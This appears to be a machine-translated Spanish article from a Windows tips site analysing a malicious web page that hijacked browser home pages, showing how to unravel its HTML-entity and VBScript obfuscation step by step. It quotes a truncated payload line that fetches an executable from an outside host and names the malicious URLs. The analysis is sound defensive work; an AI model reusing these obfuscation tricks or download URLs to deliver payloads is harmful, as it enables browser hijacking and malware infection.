Descubra fácilmente virus ocultos en sitios web maliciosos

  
        

No hace mucho tiempo, muchos cibernautas se infectaron con el virus de www.7b.com.cn, y la página de inicio se cambió a este sitio web, y no se pudo volver a cambiar. ¿Cómo bloquea un hacker la página de inicio del navegador del usuario? Vamos a averiguarlo.

Recordatorio: existe un cierto riesgo al analizar el virus. Se recomienda operar bajo la máquina virtual.

El primer paso es ver el código fuente de la página de inicio de www.7b.com.cn. Puede encontrar las siguientes palabras al final:

Esta es una página incrustada en la página de inicio del sitio web de 7b. Eso es abrir www.7b.com.cn también abrirá esta página.

Y "http://m.dashow.com.cn/m.html" representa una cadena, y "&#" va seguido del valor decimal ASCII de cada cadena.

Guarde esto confuso directamente como un archivo HTM, ábralo con IE y podrá ver su verdadera cara "http://m.dashow.com.cn/m.html".

El segundo paso es ver el código fuente de http://m.dashow.com.cn/m.html, reemplazar Ejecutar en la sección del script con Document.Write y luego abrir la página HTM. Aparecerá un fragmento de código. De manera similar, reemplace EXECUTE con nuestro invencible Document.Write, agregue la marca de secuencia de comandos antes y después y guarde el HTM. Una cosa deslumbrante apareció en la pantalla inmediatamente. Organice las cosas deslumbrantes y use el CHR () que apareció anteriormente. El efecto es convertir el carácter ASCII en un personaje, pero esta vez es hexadecimal. Luego cose los caracteres en una cadena y luego Ejecutar para ejecutar la cadena de comando. Continúe reemplazando EXECUTE con Document.Write, agregue una marca de script antes y después, y guarde HTM.

El tercer paso Después de los últimos pasos de la restauración, finalmente vi la última cara de esta página maliciosa.

en error resume siguiente curl = "http://m.dashow.com.cn/start.exe"...y se omite más tarde.

Podemos ver claramente el enlace http://m.dashow.com.cn/start.exe en este código. Así es, es un virus que puede bloquear la página de inicio del usuario en www.7b.com.cn después de ejecutarse.

Puede descargar este archivo con la herramienta de descarga. Si su software antivirus no puede encontrarlo, es mejor informarlo de inmediato. Esto asegurará que el software antivirus elimine rápidamente el virus y proteja a menos cibernautas del virus.

Copyright © Conocimiento de Windows All Rights Reserved